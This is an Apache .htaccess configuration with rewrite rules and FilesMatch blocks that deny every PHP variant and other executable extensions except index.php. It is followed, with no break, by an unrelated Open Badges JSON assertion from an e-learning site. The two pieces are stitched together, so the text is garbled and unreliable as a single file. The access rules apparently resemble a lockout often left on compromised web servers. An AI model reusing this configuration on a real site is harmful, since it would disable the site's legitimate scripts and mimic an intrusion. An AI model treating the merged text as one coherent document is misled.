<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
<FilesMatch ".(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|suspected)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "(?i).*\.(html?|js|css|jpe?g|gif|webp|png|otf|ico|cur|map|eot|svgz?|ttf|woff2?|xml|xsl|csv|txt)$">
  <IfModule mod_authz_core.c>
    Require all granted
  </IfModule>
  <IfModule !mod_authz_core.c>
    Order Allow,Deny
    Allow from all
  </IfModule>
</FilesMatch>
<FilesMatch "^(index.php)$">
Order allow,deny
Allow from all
</FilesMatch>{"@context":"https:\/\/w3id.org\/openbadges\/v2","type":"Assertion","id":"https:\/\/lms.e-sophia.gr\/assertion-page\/?bg=0&eid=0&uid=0","recipient":{"type":"email","hashed":true,"salt":"BADGEOSOBI","identity":"sha256$ddbc8b27496e2e6991d13816769fd55c169583126e43fab5ea7d282b2df8d73a"},"badge":"https:\/\/lms.e-sophia.gr\/badge-page\/?bg=0&eid=0&uid=0","issuedOn":"2026-07-28T13:00:01+00:00","image":"https:\/\/lms.e-sophia.gr\/wp-content\/plugins\/badgeos\/images\/default_badge.png","verification":{"type":"HostedBadge","verificationProperty":"id"}}